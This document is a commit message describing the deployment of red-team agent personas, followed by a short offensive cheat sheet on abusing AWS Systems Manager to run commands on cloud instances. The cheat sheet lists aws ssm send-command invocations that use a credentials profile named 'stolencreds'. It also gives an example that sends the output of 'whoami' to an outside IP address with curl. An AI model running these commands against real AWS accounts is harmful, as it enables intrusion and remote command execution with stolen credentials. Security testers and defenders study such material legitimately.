- install_opencode: deploys 29 personas as agents + 1011 skills to
~/.config/opencode/{agents,skills}/. Uses OpenCode's markdown+YAML
agent format (mode/color/permission) and SKILL.md format.
- Topic filter with sensible defaults (drops marketing/biz ~514 skills).
CLI: --opencode-topics security-offensive,coding-backend,...
- Clone of swisskyrepo/InternalAllTheThings (168 MD, 1.7MB) added to
_shared/ as a reference trove for AD attack paths, ADCS ESC1-15,
Kerberos delegation, NTLM relay/coerce, lateral movement, persistence.
- NEO redteam + VORTEX cloud-ad personas reference the new KB with
MITRE ATT&CK TTP mapping pointers.
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
29 lines
1.3 KiB
Markdown
29 lines
1.3 KiB
Markdown
# AWS - Service - SSM
|
|
|
|
## Command execution
|
|
|
|
:warning: The ssm-user account is not removed from the system when SSM Agent is uninstalled.
|
|
|
|
SSM Agent is preinstalled, by default, on the following Amazon Machine Images (AMIs):
|
|
|
|
* Windows Server 2008-2012 R2 AMIs published in November 2016 or later
|
|
* Windows Server 2016 and 2019
|
|
* Amazon Linux
|
|
* Amazon Linux 2
|
|
* Ubuntu Server 16.04
|
|
* Ubuntu Server 18.04
|
|
* Amazon ECS-Optimized
|
|
|
|
```powershell
|
|
$ aws ssm describe-instance-information --profile stolencreds --region eu-west-1
|
|
$ aws ssm send-command --instance-ids "INSTANCE-ID-HERE" --document-name "AWS-RunShellScript" --comment "IP Config" --parameters commands=ifconfig --output text --query "Command.CommandId" --profile stolencreds
|
|
$ aws ssm list-command-invocations --command-id "COMMAND-ID-HERE" --details --query "CommandInvocations[].CommandPlugins[].{Status:Status,Output:Output}" --profile stolencreds
|
|
|
|
e.g:
|
|
$ aws ssm send-command --instance-ids "i-05b████████adaa" --document-name "AWS-RunShellScript" --comment "whoami" --parameters commands='curl 162.243.███.███:8080/`whoami`' --output text --region=us-east-1
|
|
```
|
|
|
|
## References
|
|
|
|
* [What is AWS Systems Manager? - AWS](https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html)
|